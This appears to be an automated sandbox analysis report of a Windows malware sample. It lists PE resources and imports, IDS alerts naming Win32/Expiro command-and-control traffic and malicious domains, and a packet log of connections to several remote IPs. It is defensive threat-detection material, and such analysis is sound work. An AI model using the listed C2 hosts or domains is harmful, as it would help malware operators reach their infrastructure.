RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0xca155	data			1.0003153190702798
RT_GROUP_ICON	0x196910	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x196988	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x19699c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1969b0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1969c4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x196aa0	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-28T06:41:02.280797+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49730	54.244.188.177	80	TCP
2024-11-28T06:41:04.790478+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.4	49732	TCP
2024-11-28T06:41:04.790478+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.4	49732	TCP
2024-11-28T06:41:06.032019+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.4	49733	TCP
2024-11-28T06:41:06.032019+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.4	49733	TCP
2024-11-28T06:41:07.763274+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	158.101.44.242	80	TCP
2024-11-28T06:41:11.009333+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	54346	1.1.1.1	53	UDP
2024-11-28T06:41:11.056923+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.4	49739	TCP
2024-11-28T06:41:11.056923+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.4	49739	TCP
2024-11-28T06:41:14.394986+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	53257	1.1.1.1	53	UDP
2024-11-28T06:42:03.143316+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49753	82.112.184.197	80	TCP
2024-11-28T06:42:52.124720+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.4	49860	TCP
2024-11-28T06:42:52.124720+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.4	49860	TCP
2024-11-28T06:43:04.592026+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.246.200.160	80	192.168.2.4	49890	TCP
2024-11-28T06:43:04.592026+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.246.200.160	80	192.168.2.4	49890	TCP
2024-11-28T06:43:06.709429+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.208.156.248	80	192.168.2.4	49896	TCP
2024-11-28T06:43:06.709429+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.208.156.248	80	192.168.2.4	49896	TCP
2024-11-28T06:43:08.535788+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49900	208.100.26.245	80	TCP
2024-11-28T06:43:11.648505+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.4	49904	TCP
2024-11-28T06:43:11.648505+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.4	49904	TCP
2024-11-28T06:43:17.543971+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	35.164.78.200	80	192.168.2.4	49909	TCP
2024-11-28T06:43:17.543971+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	35.164.78.200	80	192.168.2.4	49909	TCP
2024-11-28T06:43:19.271629+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.94.10.34	80	192.168.2.4	49910	TCP
2024-11-28T06:43:19.271629+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.94.10.34	80	192.168.2.4	49910	TCP
2024-11-28T06:43:28.216662+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.246.231.120	80	192.168.2.4	49915	TCP
2024-11-28T06:43:28.216662+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.246.231.120	80	192.168.2.4	49915	TCP
2024-11-28T06:44:16.660328+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49931	18.246.231.120	80	TCP
2024-11-28T06:44:54.312485+0100	2051651	ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)	1	192.168.2.4	63363	1.1.1.1	53	UDP
2024-11-28T06:44:54.434942+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.254.94.185	80	192.168.2.4	49950	TCP
2024-11-28T06:44:54.434942+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.254.94.185	80	192.168.2.4	49950	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 06:41:01.532716990 CET	49730	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.540832996 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.656610012 CET	80	49730	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:01.656755924 CET	49730	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.664654970 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:01.664760113 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.707511902 CET	49730	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.707532883 CET	49730	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.711091042 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.711157084 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:01.831351995 CET	80	49730	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:01.831372023 CET	80	49730	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:01.834784031 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:01.834909916 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:02.280797005 CET	49730	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.093574047 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.093631983 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.093710899 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.097697020 CET	49731	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.120362043 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.221410990 CET	80	49731	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.244107008 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.244847059 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.245058060 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.245058060 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:03.369379044 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.369400024 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:03.664647102 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:03.788474083 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:03.788593054 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:03.789482117 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:03.789829969 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:03.913305044 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:03.913517952 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:04.658366919 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:04.658418894 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:04.658524990 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:04.666768074 CET	49732	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:04.790477991 CET	80	49732	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:05.907382011 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:05.907444000 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:05.907793045 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:05.908121109 CET	49733	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:41:05.990885973 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:41:06.032018900 CET	80	49733	18.141.10.107	192.168.2.4
Nov 28, 2024 06:41:06.114768982 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:41:06.114878893 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:41:06.115438938 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:41:06.239378929 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:41:06.259628057 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:06.259670019 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:06.260030031 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:06.267143965 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:06.267158985 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:06.649035931 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:06.773015022 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:06.773121119 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:06.775475979 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:06.775475979 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:06.900537014 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:06.900573969 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:07.326824903 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:41:07.332174063 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:41:07.456111908 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:41:07.499615908 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.499773979 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:07.504354000 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:07.504360914 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.504771948 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.560168028 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:07.574987888 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:07.615338087 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.710310936 CET	80	49734	158.101.44.242	192.168.2.4
Nov 28, 2024 06:41:07.763273954 CET	49734	80	192.168.2.4	158.101.44.242
Nov 28, 2024 06:41:07.947376966 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.947452068 CET	443	49735	104.26.12.205	192.168.2.4
Nov 28, 2024 06:41:07.947801113 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:07.955106020 CET	49735	443	192.168.2.4	104.26.12.205
Nov 28, 2024 06:41:08.077255964 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:08.077285051 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:08.077426910 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:08.083256960 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:08.083271027 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:08.936341047 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:08.936377048 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:08.936449051 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:08.936789989 CET	49736	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:41:09.060549021 CET	80	49736	54.244.188.177	192.168.2.4
Nov 28, 2024 06:41:09.256102085 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:09.310592890 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.310698032 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:09.318339109 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:09.318348885 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.318907022 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.379929066 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:09.380033016 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:09.450810909 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:09.478554964 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:09.523336887 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.589737892 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:09.713634014 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:09.714210033 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:09.727304935 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:09.727328062 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:09.810679913 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.810856104 CET	443	49737	172.67.177.134	192.168.2.4
Nov 28, 2024 06:41:09.810957909 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:09.851299047 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:09.851329088 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:09.857193947 CET	49737	443	192.168.2.4	172.67.177.134
Nov 28, 2024 06:41:10.866259098 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:10.866449118 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:10.932003975 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:10.932183981 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:10.932246923 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:10.933242083 CET	49739	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:41:10.991538048 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:11.056922913 CET	80	49739	44.221.84.105	192.168.2.4
Nov 28, 2024 06:41:11.278064966 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:11.278254032 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:11.281466007 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:11.402023077 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:11.405168056 CET	80	49740	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:11.405255079 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:11.405472040 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:11.405508995 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:11.529203892 CET	80	49740	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:11.529239893 CET	80	49740	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:11.690181017 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:11.690658092 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:11.814488888 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.108002901 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.108030081 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.108042955 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.108083963 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:12.135483027 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:12.259233952 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.547068119 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.549949884 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:12.581767082 CET	80	49740	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:12.582878113 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:12.591816902 CET	49740	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:12.673755884 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.715636969 CET	80	49740	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:12.908714056 CET	49741	80	192.168.2.4	172.234.222.143
Nov 28, 2024 06:41:12.961513996 CET	587	49738	51.195.88.199	192.168.2.4
Nov 28, 2024 06:41:12.962646961 CET	49738	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:41:13.032605886 CET	80	49741	172.234.222.143	192.168.2.4
Nov 28, 2024 06:41:13.032685995 CET	49741	80	192.168.2.4	172.234.222.143
